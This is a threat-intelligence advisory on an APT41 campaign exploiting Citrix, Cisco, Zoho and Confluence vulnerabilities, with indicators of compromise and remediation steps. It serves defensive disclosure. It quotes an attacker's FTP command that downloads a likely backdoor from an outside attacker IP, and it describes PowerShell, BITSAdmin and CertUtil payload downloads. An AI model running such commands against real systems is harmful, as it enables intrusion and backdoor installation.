Rewterz Threat Alert – APT41 Global Intrusion Using Multiple Exploits

Severity

High

Analysis Summary

Chinese actor APT41 ia carrying out one of the broadest campaigns. APT41 is attempting to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 organizations in 20 countries. 

Targeted Countries: The campaign targeted victims in Qatar, Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK, and USA.

Targeted Industries: The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility.

Vulnerabilities Exploited: CVE-2019-19781 in Citrix NetScaler/ADC, CVE-2019-1652 and CVE-2019-1653 in Cisco routers, and CVE-2020-10189 in Zoho ManageEngine Zero-Day Vulnerability,CVE-2019-3396 in Widget Connector macro in Atlassian Confluence Server 

Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781.The exploitation involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

Exploitation of Vulnerabilities in Cisco Routers 

APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

Attackers attempted to exploit a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189).APT41 used 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen organizations, compromising at least 5 of them. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345. In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that was observed to have been used by APT41 in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP observed being leveraged by this group in multiple intrusions in order to delay analysis of other tools in their toolkit.The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

Impact

• Unauthorized Access
• Data theft
• Leakage of confidential information
• System compromise

Indicators of Compromise

Hostname

• exchange[.]dumb1[.]com
• accounts[.]longmusic[.]com
• www[.]dylerays[.]tk

MD5

• 3e856162c36b532925c8226b4ed3481c
• 5909983db4d9023e4098e56361c96a6f
• c0c467c8e9b2046d7053642cc9bdd57d
• 09e4e6fa85b802c46bc121fcaecc5666
• 71cdba3859ca8bd03c1e996a790c04f9
• 155e98e5ca8d662fad7dc84187340cbc
• 013f3bde3f1022b6cf3f2e541d19353c
• 659bd19b562059f3f0cc978e15624fd9
• 7966c2c546b71e800397a67f942858d0

SHA-256

• d781794dc6d639a00e1ea587f3c7b928776848d515a991fa7b9c58a1b51f9bdb
• f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c
• de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc
• 63f4ab79d198d814d2e3dd01467451639a4b31408516f3bce816706696fcd82e
• 11cbd7a2ce58191e4dbd3efffba97c5c4c0edd437511e2ecbd42811dac1cfa3d
• d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309
• b9f0c34f879658596a99a263c0c94d0aea6c6459bd6fcdc3276d2d4dfa48c633
• 770fbe9d6fef71b7d7a9f07d9eae6dca9ce8b3178989fae0ed32d2d10651ab57
• 11c4e1b0af8bfc4ee951ccc794cc6e7d61e0533dcd4dbd780998414702b71ff9

SHA1

• f87ab33491ee84c579cab9d87c7064a27a8ce371
• e6f7e8d4eff47f71b336966579b0e10093eebe3e
• b0aa2e0df219236af891f794965a29642de9c96f
• 0b83939510bd31939c91370c53fab25aa286ba08
• a2c1f872d0625e4d58c01a8434ffee770e52c00f
• c81391b8ca99106c4739579b288b9f5abfacde76
• b2e7a06bf116d7d5a2d45a97f7e1512bd37b4481

URL

• http[:]//66[.]42[.]98[.]220[:]12345/test/install[.]bat
• http[:]//91[.]208[.]184[.]78/2[.]exe
• http[:]//66[.]42[.]98[.]220/test/1[.]txt[.]
• http[:]//66[.]42[.]98[.]220[:]12345/test/install[.]bat’
• http[:]//66[.]42[.]98[.]220[:]12345/test/storesyncsvc[.]dll’
• http[:]//91[.]208[.]184[.]78[:]443
• http[:]//74[.]82[.]201[.]8[:]12345/1[.]txt
• https[:]//exchange[.]dumb1[.]com/jquery-3[.]3[.]1[.]min[.]js
• http[:]//91[.]208[.]184[.]78[:]443/match
• http[:]//91[.]208[.]184[.]78[:]443/TzGG
• http[:]//91[.]208[.]184[.]78[:]443/
• http[:]//91[.]208[.]184[.]78/match
• http[:]//91[.]208[.]184[.]78/TzGG
• http[:]//66[.]42[.]98[.]220[:]12345/test/storesyncsvc[.]f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c
• http[:]//66[.]42[.]98[.]220[:]12345/test/storesyncsvc[.]dll
• http[:]//66[.]42[.]98[.]220[:]12345/test/123
• http[:]//66[.]42[.]98[.]220[:]12345/test/1[.]txt
• http[:]//66[.]42[.]98[.]220[:]12345/storesyncsvc[.]dll
• http[:]//66[.]42[.]98[.]220[:]12345/test/
• http[:]//66[.]42[.]98[.]220/test/storesyncsvc[.]dll
• http[:]//66[.]42[.]98[.]220/test/install[.]bat

Remediation

• Block the threat indicators at their respective controls.
• Upgrade all of your vulnerable appliances to a fixed build of the appliance at your earliest.